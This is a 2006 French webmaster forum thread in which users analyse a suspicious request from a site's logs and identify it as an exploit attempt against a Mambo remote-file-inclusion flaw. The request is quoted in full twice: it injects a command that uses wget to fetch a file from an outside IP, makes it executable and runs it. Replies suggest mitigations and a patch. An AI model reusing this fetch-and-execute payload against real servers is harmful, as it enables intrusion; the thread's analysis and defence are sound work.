Version complète: sur le forum Webmaster Hub : Entrée étrange sur un site
Webmaster Hub > Accueil > Le salon de Webmaster Hub
Régis
Bonjour,

En regardant les stats d'un de mes sites, j'ai vu plusieurs accès direct via ce code :
CODE
http://xxx.xxx.xxx.xxx/index.php?
option=com_content&do_pdf=1&id=1index2.php?
_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=&mosConfig_absolute_path=
http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;
wget%20219.84.105.36/supina;chmod%20744%20supina;./sup
NB : j'ai scindé la requête pour qu'elle puisse rentrée dans le post, mais il s'agit bien d'une seule et unique ligne...

L'adresse IP du site en question a été remplacé par des xxx : il s'agit du site de mon entreprise.
La seconde IP m'est inconnu...
Quand on colle cette ligne dans la barre d'adresse du navigateur, on tombe directement sur le site de mon entreprise...
Quelqu'un peut-il m'expliquer à quoi corresponds cette entrée bizarre (code après le index.php) ?

Merci
Théo B.
Il s'agit à mon avis d'une tentative de hack.
Trouve l'ip dans tes logs et regarde d'où ça vient.


//EDIT : D'après l'ip "219.84.105.36" que tu as dans tes stats ça viendrait de Taiwan...
Régis
CITATION(Théo B. @ samedi 25 février 2006, 17h15)
Il s'agit à mon avis d'une tentative de hack.
Trouve l'ip dans tes logs et regarde d'où ça vient.

Je pense aussi.
Je viens de faire une requête sur GG : com_content&do_pdf et j'ai bien l'impression qu'il s'agit de spam...

A votre avis...
Dan
Le plus inquiétant est l'appel de wget... il télécharge un programme en provenance de son serveur et tente de l'exécuter chez toi.
Ce n'est vraisemblablement pas du spam mais une tentative d'intrusion, comme le montre cette partie de l'URL:
CODE
&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./sup

à laquelle il doit manquer la fin ...

Si tu es sur un serveur dédié, le plus simple est de supprimer le droit d'exécution de wget à l'utilisateur Apache (nobody)
Ou encore de lancer une commande "chmod 700 /usr/bin/wget"

Dan
Régis
CITATION(Dan @ samedi 25 février 2006, 17h46)
Le plus inquiétant est l'appel de wget... il télécharge un programme en provenance de son serveur et tente de l'exécuter chez toi.
Ce n'est vraisemblablement pas du spam mais une tentative d'intrusion.
Si tu es sur un serveur dédié, le plus simple est de supprimer le droit d'exécution de wget à l'utilisateur Apache (nobody)
Ou encore de lancer une commande "chmod 700 /usr/bin/wget"

Merci DAN,
Je vois cela avec le responsable "réseau" et mon hébergeur...
La 1ère attaque est venu, a priori, de 213.196.223.21.
Selon dnsstuff.com : http://www.dnsstuff.com/tools/ip4r.ch?ip=213.196.223.21 ... cela correspondrait à mail.compecon.de
Dan
Une attaque venant d'un serveur de mail ? je ne pense pas... tu as dû te louper dans l'analyse du log.

Une simple règle de réécriture et tu te débarrasses de toutes les URLs qui contiennent wget dans la QUERY_STRING wink.gif
Mais il ne faut pas que tu utilises toi-même "wget" dans tes noms ou valeurs de variables...

Au moins tu éviteras 95% des tentatives de hack smile.gif

Dan
Régis
CITATION(Dan @ samedi 25 février 2006, 17h58)
Une attaque venant d'un serveur de mail ? je ne pense pas... tu as dû te louper dans l'analyse du log.

Ok, je vais revirifier...

CITATION(Dan @ samedi 25 février 2006, 17h58)
Une simple règle de réécriture et tu te débarrasses de toutes les URLs qui contiennent wget dans la QUERY_STRING wink.gif
Mais il ne faut pas que tu utilises toi-même "wget" dans tes noms ou valeurs de variables...
Au moins tu éviteras 95% des tentatives de hack smile.gif

Nous n'utilisons pas WGET sur le site...
Responsable réseau et hébergeur => contactés...

Merci DAN... toujours aussi prompt et perspicace...
Jeanluc
Bonjour,

Vous m'inquiétez... blink.gif Le risque dont vous parlez est seulement présent si /index.php ne traite pas ces variables avec toute la prudence nécessaire ou je me trompe ?

Jean-Luc
Dan
Il ne faut pas permettre à un script d'appeler wget, c'est le plus simple.

L'exemple plus haut fait vraisemblablement appel à une faille d'un fichier index.php, comme on en trouve souvent dans le forum phpBB.

Donc le hacker lance cette ligne de commande (les arguments) en espérant qu'elle soit prise en compte.
Mais normalement, un fichier index.php non buggé ne les prendra pas. Donc, pas de risque. smile.gif

Dan
baboon
Bonjour a tous,

ça y est Régis, me voilà rolleyes.gif
Pour completer le post ....j'ai analyser la requête et fait quelques recherche...
"mosConfig_absolute_path" est une variable de Mambo; jusqu'a la version 4.5.2.3 de mambo il y a une faille de sécurité (il existe un patch pour la corriger):
CITATION
Une vulnérabilité a été identifiée dans Mambo, elle pourrait être exploitée par un attaquant distant afin de compromettre un serveur web vulnérable. Le problème résulte d'une erreur présente au niveau de l'émulation "register_globals" dans "globals.php", ce qui pourrait être exploité afin d'inclure un fichier malicieux via la variable "mosConfig_absolute_path" et exécuter des commandes arbitraires avec les privilèges du serveur web.
Source ici
Je ne pense pas que le site soit visé directement (On n'utilise pas Mambo); je dirais plûtot qu'on cherche a utiliser une machine ou mambo est installé pour faire une attaque par rebond sur une autre cible....à vérifier...

Bonne journée à tous
Régis
CITATION(baboon @ dimanche 26 février 2006, 08h04)
On n'utilise pas Mambo

OK merci à toi pour ces infos Baboon... cela est rassurant
A toute fin utile pour les utilisateurs de Mambo : sur l'URL que tu as donné => il y a un lien vers un correctif
suede
CITATION(Dan @ samedi 25 février 2006, 19h25)
Il ne faut pas permettre à un script d'appeler wget, c'est le plus simple.

L'exemple plus haut fait vraisemblablement appel à une faille d'un fichier index.php, comme on en trouve souvent dans le forum phpBB.

Donc le hacker lance cette ligne de commande (les arguments) en espérant qu'elle soit prise en compte.
Mais normalement, un fichier index.php non buggé ne les prendra pas. Donc, pas de risque. smile.gif

Dan
*


C'etait une faille de php en fait si je me souviens bien.
Le ver qui l'utilisait etait santy (et s'etait specialisé entre autres sur phpbb mais beaucoup d'autres scripts étaient concernés). Il y a pas mal d'exemple de htaccess pour virer ce ver.
Il avait essayé de venir sur mon phpbb mais excepté la conso de bande passante, il n'avait rien pu faire.

François
Ceci est une version "bas débit" de notre forum. Pour voir la version complète avec plus d'information, la mise en page et les images, veuillez cliquer ici.